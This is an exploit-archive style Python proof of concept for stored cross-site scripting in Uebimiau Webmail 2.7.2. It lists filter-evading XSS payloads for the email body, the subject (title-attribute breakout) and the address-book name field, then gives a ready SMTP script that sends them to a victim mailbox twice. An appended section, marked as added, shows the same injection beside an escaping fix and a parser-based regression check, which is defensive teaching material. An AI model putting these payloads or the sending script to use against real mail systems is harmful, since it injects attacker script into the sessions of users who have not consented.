#!/usr/bin/python

'''
# Exploit Title: Uebimiau Webmail Stored XSS
# Date: 17/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://www.uebimiau.org/
# Software Link: http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip
# Version: 2.7.2

#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar


About the Application:
======================

Uebimiau is a universal webmail developed in PHP by Aldoir Ventura. It is free and can be installed in any email server.

-It runs under any System;
-It doesn't require any extra PHP modules;
-Doesn't need a database (as MySQL, PostgreSQL, etc)
-Doesn't need IMAP, but compatible with POP3 and IMAP
-Compatible with the MIME Standard (send/receive text/html emails);
-Doesn't need cookies;
-Easy installation. You only modify one file;
-Compatible with Apache, PHP, Sendmail or QMAIL;
-Can be easily translated into any language (already translated in 17 languages);
-Can use a variety of skins


Vulnerability Description
=========================

1. Stored XSS in e-mail body.

XSS Payload: <scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>

Send an email to the victim with the payload in the email body, once the user opens the message the XSS should be triggered.

2. Stored XSS in "Title" field (works when victim opens message in full view).

XSS Payload: SubjectGoesHere"><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>

This one requires you to send at least 2 messages to the victim with the payload in the email subject.

Location of injection in page source:

<a class="menu" href="https://www.exploit-db.com/exploits/20675/readmsg.php?folder=inbox&pag=1&ix=1&sid={4F0FCD8FECD59-4F0FCD8FECD6C-1326435727}&tid=0&lid=5" title="Uebimiau Webmail Stored XSS POC "><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>">Next</a> ::
<a class="menu" href="javascript:goback()">Back</a> ::

3. Stored XSS in Address Book

XSS Payload: <script>alert("XSS")</script>

Create a new contact with the XSS Payload in the "Name" field, Save contact, XSS Should be triggered when viewing contacts.

'''

import smtplib

print("###############################################")
print("#Uebimiau Webmail Stored XSS POC#")
print("#Coded by: Shai rod #")
print("# @NightRang3r#")
print("# http://exploit.co.il#")
print("# For Educational Purposes Only!#")
print("###############################################\r\n")

# SETTINGS

sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server = "10.0.0.5"
smtp_port = 25
subject = "Uebimiau Webmail Stored XSS POC"
xss_payload_1 = """ "><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>"""
xss_payload_2 = """<scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>"""

# SEND E-MAIL

print("[*] Sending E-mail to " + recipient + "...")
# recipient is a single address string, so it goes into the To header as-is
# (joining it with ", " would split it into individual characters).
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
       % (sender, recipient, subject + xss_payload_1))
msg += "Content-type: text/html\n\n"
msg += """Nothing to see here...\r\n"""
msg += xss_payload_2
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
# The subject-field issue needs at least two messages in the mailbox.
print("[*] Sending Message 1\r")
server.sendmail(sender, recipient, msg)
print("[*] Sending Message 2\r")
server.sendmail(sender, recipient, msg)
server.quit()
print("[+] E-mail sent!")
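
The title-attribute injection from item 2, shown beside its fix, as an added example that is not part of the original exploit or of Uebimiau's code. The link template is a shortened copy of the page-source snippet, and the function names and sample subject are constructed for illustration.

```python
import html
from html.parser import HTMLParser

# Simplified copy of the "Next" link from the page source; the href is shortened.
LINK = '<a class="menu" href="readmsg.php?ix=1" title="%s">Next</a>'

# Constructed sample subject with the same shape as the subject payload above.
SAMPLE = "SubjectGoesHere\"><img src='1.jpg' onerror=alert(1)>"


def next_link_raw(subject):
    """Vulnerable form: the subject is copied into title="" unchanged."""
    return LINK % subject


def next_link_escaped(subject):
    """Hardened form: &, <, >, " and ' are escaped for a quoted attribute."""
    return LINK % html.escape(subject, quote=True)


class TagAudit(HTMLParser):
    """Records each start tag and its attributes as an HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def audit(markup):
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags


def check(markup):
    """Return (elements other than the expected <a>, event-handler attributes)."""
    tags = audit(markup)
    extra = [tag for tag, _ in tags if tag != "a"]
    handlers = [k for _, attrs in tags for k in attrs if k.startswith("on")]
    return extra, handlers


if __name__ == "__main__":
    print("raw:    ", check(next_link_raw(SAMPLE)))
    print("escaped:", check(next_link_escaped(SAMPLE)))
```

The same escaping applies wherever a message field or contact name is written into HTML; the parser-based check can be reused as a regression test for each such sink.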